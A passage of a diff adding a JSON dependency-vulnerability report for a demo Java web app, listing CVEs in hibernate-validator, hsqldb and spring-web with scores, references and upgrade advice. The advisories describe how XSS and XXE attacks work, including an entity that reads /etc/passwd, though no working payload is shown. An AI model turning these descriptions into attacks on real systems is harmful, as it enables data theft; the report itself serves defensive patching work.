"org.hibernate:hibernate-validator", + "version": "4.3.1.Final" + }, + { + "id": "SNYK-JAVA-ORGHIBERNATE-569100", + "title": "Cross-site Scripting (XSS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N/E:U/RL:O/RC:R", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,6.0.18.Final)", + "[6.1.0.Alpha1,6.1.0.Final)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "6.0.18.Final", + "6.1.0.Final" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 6.5, + "functions": [ + { + "version": [ + "[,6.0.18.Final)", + "[6.1.0.Alpha1,6.1.0.Final)" + ], + "functionId": { + "filePath": "org/hibernate/validator/internal/constraintvalidators/hv/SafeHtmlValidator.java", + "className": "SafeHtmlValidator", + "functionName": "getFragmentAsDocument" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.hibernate:hibernate-validator", + "references": [ + { + "url": "https://lists.apache.org/thread.html/r87b7e2d22982b4ca9f88f5f4f22a19b394d2662415b233582ed22ebf@%3Cnotifications.accumulo.apache.org%3E", + "title": "Apache Security Advisory" + }, + { + "url": "https://github.com/hibernate/hibernate-validator/commit/124b7dd6d9a4ad24d4d49f74701f05a13e56ceee", + "title": "GitHub Commit" + }, + { + "url": "https://in.relation.to/2019/11/20/hibernate-validator-610-6018-released/", + "title": "Hibernator Security Release Blog" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-10219", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", + "cvssV3BaseScore": 6.1, + "modificationTime": "2024-03-11T09:51:34.418099Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", + "cvssV3BaseScore": 6.5, + "modificationTime": "2024-03-11T09:54:00.455389Z" + } + ], + 
"cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N/E:U/RL:O/RC:R", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:01:47.749976Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 6.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:34.418099Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:54:00.455389Z" + } + ], + "description": "## Overview\n[org.hibernate:hibernate-validator](https://mvnrepository.com/artifact/org.hibernate/hibernate-validator) is a Hibernate Validator Engine Relocation Artifact.\n\nAffected versions of this package are vulnerable to Cross-site Scripting (XSS). The `SafeHtml` validator annotation fails to properly sanitize payloads consisting of potentially malicious code in HTML comments and instructions.\n## Details\n\nA cross-site scripting attack occurs when the attacker tricks a legitimate web-based application or site to accept a request as originating from a trusted source.\n\nThis is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. 
The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.\n\nInjecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.\n\nEscaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, `<` can be coded as `<`; and `>` can be coded as `>`; in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses `<` and `>` as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.\n \nThe most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware. \n\n### Types of attacks\nThere are a few methods by which XSS can be manipulated:\n\n|Type|Origin|Description|\n|--|--|--|\n|**Stored**|Server|The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link.|\n|**Reflected**|Server|The attacker delivers a malicious link externally from the vulnerable web site application to a user. 
When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser.| \n|**DOM-based**|Client|The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data.|\n|**Mutated**| |The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters.|\n\n### Affected environments\nThe following environments are susceptible to an XSS attack:\n\n* Web servers\n* Application servers\n* Web application environments\n\n### How to prevent\nThis section describes the top best practices designed to specifically protect your code: \n\n* Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches. \n* Convert special characters such as `?`, `&`, `/`, `<`, `>` and spaces to their respective HTML or URL encoded equivalents. 
\n* Give users the option to disable client-side scripts.\n* Redirect invalid requests.\n* Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.\n* Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.\n* Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.\n\n## Remediation\nUpgrade `org.hibernate:hibernate-validator` to version 6.0.18.Final, 6.1.0.Final or higher.\n## References\n- [Apache Security Advisory](https://lists.apache.org/thread.html/r87b7e2d22982b4ca9f88f5f4f22a19b394d2662415b233582ed22ebf@%3Cnotifications.accumulo.apache.org%3E)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/124b7dd6d9a4ad24d4d49f74701f05a13e56ceee)\n- [Hibernator Security Release Blog](https://in.relation.to/2019/11/20/hibernate-validator-610-6018-released/)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-10219)\n", + "epssDetails": { + "percentile": "0.61710", + "probability": "0.00232", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-10219" + ], + "CWE": [ + "CWE-79" + ] + }, + "packageName": "org.hibernate:hibernate-validator", + "proprietary": false, + "creationTime": "2020-05-14T16:07:06.897969Z", + "functions_new": [ + { + "version": [ + "[,6.0.18.Final)", + "[6.1.0.Alpha1,6.1.0.Final)" + ], + "functionId": { + "className": "org.hibernate.validator.internal.constraintvalidators.hv.SafeHtmlValidator", + "functionName": "getFragmentAsDocument" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-10-18T14:55:21Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + 
"mavenModuleName": { + "groupId": "org.hibernate", + "artifactId": "hibernate-validator" + }, + "publicationTime": "2020-01-09T14:55:12Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:54:00.455389Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-validator@4.3.1.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "org.hibernate:hibernate-validator", + "version": "4.3.1.Final" + }, + { + "id": "SNYK-JAVA-ORGHSQLDB-3040860", + "title": "Remote Code Execution (RCE)", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H", + "credit": [ + "OSS Fuzz Team" + ], + "semver": { + "vulnerable": [ + "[,2.7.1)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.7.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.hsqldb:hsqldb", + "references": [ + { + "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50212%23c7", + "title": "Chromium Bugs" + }, + { + "url": "https://github.com/ryenus/hsqldb/commit/b6719c67b41eb9298c2451ad2829bf03b262a941", + "title": "GitHub Commit" + }, + { + "url": "http://hsqldb.org/doc/2.0/guide/sqlroutines-chapt.html%23src_jrt_access_control", + "title": "Mitigation" + }, + { + "url": "https://sourceforge.net/p/hsqldb/svn/6614/tree//base/trunk/src/org/hsqldb/persist/HsqlDatabaseProperties.java", + "title": "SVN Commit" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:51:53.988304Z" + }, + { + "assigner": "Red Hat", + "severity": "critical", + "cvssV3Vector": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:53:59.414572Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:05:55.045961Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:53.988304Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:59.414572Z" + } + ], + "description": "## Overview\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE) when using `java.sql.Statement` or `java.sql.PreparedStatement` to process untrusted input. By default, it is allowed to call any static method of any Java class in the classpath resulting in code execution.\n\n## Workaround\nUsers who are unable to upgrade to the fixed version can set the system property `hsqldb.method_class_names` to classes which are allowed to be called. 
For example, `System.setProperty(\"hsqldb.method_class_names\", \"abc\")` or Java argument `-Dhsqldb.method_class_names=\"abc\"` can be used.\n## Remediation\nUpgrade `org.hsqldb:hsqldb` to version 2.7.1 or higher.\n## References\n- [Chromium Bugs](https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50212#c7)\n- [GitHub Commit](https://github.com/ryenus/hsqldb/commit/b6719c67b41eb9298c2451ad2829bf03b262a941)\n- [Mitigation](http://hsqldb.org/doc/2.0/guide/sqlroutines-chapt.html#src_jrt_access_control)\n- [SVN Commit](https://sourceforge.net/p/hsqldb/svn/6614/tree//base/trunk/src/org/hsqldb/persist/HsqlDatabaseProperties.java)\n", + "epssDetails": { + "percentile": "0.85801", + "probability": "0.01274", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2022-41853" + ], + "CWE": [ + "CWE-94" + ], + "GHSA": [ + "GHSA-77xx-rxvh-q682" + ] + }, + "packageName": "org.hsqldb:hsqldb", + "proprietary": false, + "creationTime": "2022-10-07T07:26:42.276748Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2022-10-06T18:52:05Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.hsqldb", + "artifactId": "hsqldb" + }, + "publicationTime": "2022-10-07T07:26:42.515068Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:59.414572Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hsqldb:hsqldb@2.3.2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "org.hsqldb:hsqldb", + "version": "2.3.2" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-1009832", + 
"title": "Improper Input Validation", + "CVSSv3": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[3.2.0.RELEASE,4.3.29.RELEASE)", + "[5.0.0.RELEASE, 5.0.19.RELEASE)", + "[5.1.0.RELEASE, 5.1.18.RELEASE)", + "[5.2.0.RELEASE, 5.2.9.RELEASE)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "4.3.29.RELEASE", + "5.0.19.RELEASE", + "5.1.18.RELEASE", + "5.2.9.RELEASE" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.6, + "functions": [ + { + "version": [ + "[3.2.0.RELEASE,4.3.29.RELEASE)", + "[5.0.0.RELEASE, 5.0.19.RELEASE)", + "[5.1.0.RELEASE, 5.1.18.RELEASE)", + "[5.2.0.RELEASE, 5.2.9.RELEASE)" + ], + "functionId": { + "filePath": "org/springframework/web/util/WebUtils.java", + "className": "WebUtils", + "functionName": "parseMatrixVariables" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-web", + "references": [ + { + "url": "https://tanzu.vmware.com/security/cve-2015-5211", + "title": "CVE-2015-5211" + }, + { + "url": "https://pivotal.io/security/cve-2020-5421", + "title": "Pivotal Security Advisory" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:H/A:N", + "cvssV3BaseScore": 6.5, + "modificationTime": "2024-03-11T09:48:33.950462Z" + }, + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:H/A:N", + "cvssV3BaseScore": 6.5, + "modificationTime": "2024-03-11T09:51:07.572789Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.6, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:04:04.397840Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:H/A:N", + "assigner": 
"Red Hat", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:33.950462Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:H/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:07.572789Z" + } + ], + "description": "## Overview\n[org.springframework:spring-web](https://github.com/spring-projects/spring-framework) is a package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform.\n\nAffected versions of this package are vulnerable to Improper Input Validation. The protections against Reflected File Download attacks from CVE-2015-5211 may be bypassed depending on the browser used through the use of a `jsessionid` path parameter.\n## Remediation\nUpgrade `org.springframework:spring-web` to version 4.3.29.RELEASE, 5.0.19.RELEASE, 5.1.18.RELEASE, 5.2.9.RELEASE or higher.\n## References\n- [CVE-2015-5211](https://tanzu.vmware.com/security/cve-2015-5211)\n- [Pivotal Security Advisory](https://pivotal.io/security/cve-2020-5421)\n", + "epssDetails": { + "percentile": "0.95901", + "probability": "0.15300", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-5421" + ], + "CWE": [ + "CWE-20" + ] + }, + "packageName": "org.springframework:spring-web", + "proprietary": false, + "creationTime": "2020-09-18T14:36:44.859594Z", + "functions_new": [ + { + "version": [ + "[3.2.0.RELEASE,4.3.29.RELEASE)", + "[5.0.0.RELEASE, 5.0.19.RELEASE)", + "[5.1.0.RELEASE, 5.1.18.RELEASE)", + "[5.2.0.RELEASE, 5.2.9.RELEASE)" + ], + "functionId": { + "className": "org.springframework.web.util.WebUtils", + "functionName": "parseMatrixVariables" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-09-18T14:23:55Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": 
"secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-web" + }, + "publicationTime": "2020-09-18T16:17:53Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:07.572789Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.springframework:spring-web@3.2.6.RELEASE" + ], + "upgradePath": [ + false, + "org.springframework:spring-web@4.3.29.RELEASE" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.springframework:spring-web", + "version": "3.2.6.RELEASE" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-30163", + "title": "XML External Entity (XXE) Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[3.0.0.RELEASE,3.2.9.RELEASE)", + "[4.0.0.RELEASE,4.0.5.RELEASE)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "3.2.9.RELEASE", + "4.0.5.RELEASE" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.8, + "functions": [ + { + "version": [ + "[3,3.2.8.RELEASE]", + "[4,4.0.4.RELEASE]" + ], + "functionId": { + "filePath": "org/springframework/http/converter/xml/SourceHttpMessageConverter.java", + "className": "SourceHttpMessageConverter", + "functionName": "readDOMSource" + } + }, + { + "version": [ + "[3,3.2.8.RELEASE]", + "[4,4.0.4.RELEASE]" + ], + "functionId": { + "filePath": "org/springframework/http/converter/xml/SourceHttpMessageConverter.java", + "className": "SourceHttpMessageConverter", + "functionName": "readSAXSource" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-web", + "references": [ + { + "url": 
"https://github.com/spring-projects/spring-framework/commit/8e096aeef55287dc829484996c9330cf755891a1", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/commit/c6503ebbf7c9e21ff022c58706dbac5417b2b5eb", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/issues/16390", + "title": "GitHub Issue" + }, + { + "url": "http://www.gopivotal.com/security/cve-2014-0225", + "title": "Pivotal Security" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2014-0225", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:48:48.781285Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:33.267561Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:48.781285Z" + } + ], + "description": "## Overview\n[org.springframework:spring-web](https://github.com/spring-projects/spring-framework) is a package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection. This is due to not disabling the resolution of URI references by default in a DTD declaration. 
This occurs only when processing user provided XML documents.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. 
For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n## Remediation\nUpgrade `org.springframework:spring-web` to version 3.2.9.RELEASE, 4.0.5.RELEASE or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/8e096aeef55287dc829484996c9330cf755891a1)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/c6503ebbf7c9e21ff022c58706dbac5417b2b5eb)\n- [GitHub Issue](https://github.com/spring-projects/spring-framework/issues/16390)\n- [Pivotal Security](http://www.gopivotal.com/security/cve-2014-0225)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2014-0225)\n", + "epssDetails": { + "percentile": "0.55630", + "probability": "0.00181", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2014-0225" + ], + "CWE": [ + "CWE-611" + ] + }, + "packageName": "org.springframework:spring-web", + "proprietary": false, + "creationTime": "2016-12-25T16:51:52Z", + "functions_new": [ + { + "version": [ + "[3,3.2.8.RELEASE]", + "[4,4.0.4.RELEASE]" + ], + "functionId": { + "className": "org.springframework.http.converter.xml.SourceHttpMessageConverter", + "functionName": "readDOMSource" + } + }, + { + "version": [ + "[3,3.2.8.RELEASE]", + "[4,4.0.4.RELEASE]" + ], + "functionId": { + "className": "org.springframework.http.converter.xml.SourceHttpMessageConverter", + "functionName": "readSAXSource" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2016-12-25T16:51:52Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + 
"format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-web" + }, + "publicationTime": "2016-12-25T16:51:52Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:48.781285Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.springframework:spring-web@3.2.6.RELEASE" + ], + "upgradePath": [ + false, + "org.springframework:spring-web@3.2.9.RELEASE" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.springframework:spring-web", + "version": "3.2.6.RELEASE" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-30164", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", + "credit": [ + "Toshiaki Maki" + ], + "semver": { + "vulnerable": [ + "[3.2.0.RELEASE, 3.2.14.RELEASE)", + "[4.0.0.RELEASE, 4.1.7.RELEASE)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "3.2.14.RELEASE", + "4.1.7.RELEASE" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.5, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-web", + "references": [ + { + "url": "https://github.com/spring-projects/spring-framework/commit/5a711c05ec750f069235597173084c2ee796242", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/issues/17727", + "title": "GitHub Issue" + }, + { + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3192", + "title": "NVD" + }, + { + "url": "http://pivotal.io/security/cve-2015-3192", + "title": "Pivotal Security" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 5.5, + "modificationTime": "2024-03-11T09:46:06.799603Z" + } + ], + 
"cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:18.827537Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:06.799603Z" + } + ], + "description": "## Overview\n[org.springframework:spring-web](https://github.com/spring-projects/spring-framework) is a package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). It does not properly process inline DTD declarations when DTD is not entirely disabled, which allows remote attackers to cause a denial of service (memory consumption and out-of-memory errors) via a crafted XML file.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. 
Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `org.springframework:spring-web` to version 3.2.14.RELEASE, 4.1.7.RELEASE or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/5a711c05ec750f069235597173084c2ee796242)\n- [GitHub Issue](https://github.com/spring-projects/spring-framework/issues/17727)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3192)\n- [Pivotal Security](http://pivotal.io/security/cve-2015-3192)\n", + "epssDetails": { + "percentile": "0.91000", + "probability": "0.03030", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2015-3192" + ], + "CWE": [ + "CWE-119" + ] + }, + "packageName": "org.springframework:spring-web", + "proprietary": false, + "creationTime": "2016-12-25T16:51:55Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2015-10-16T05:57:41Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + 
{ + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-web" + }, + "publicationTime": "2016-12-25T16:51:55Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:46:06.799603Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.springframework:spring-web@3.2.6.RELEASE" + ], + "upgradePath": [ + false, + "org.springframework:spring-web@3.2.14.RELEASE" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.springframework:spring-web", + "version": "3.2.6.RELEASE" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-30165", + "title": "Reflected File Download", + "CVSSv3": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", + "credit": [ + "Alvaro Muñoz" + ], + "semver": { + "vulnerable": [ + "[3.2.0.RELEASE, 3.2.15.RELEASE)", + "[4.0.0.RELEASE, 4.1.8.RELEASE)", + "[4.2.0.RELEASE, 4.2.2.RELEASE)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "3.2.15.RELEASE", + "4.1.8.RELEASE", + "4.2.2.RELEASE" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.6, + 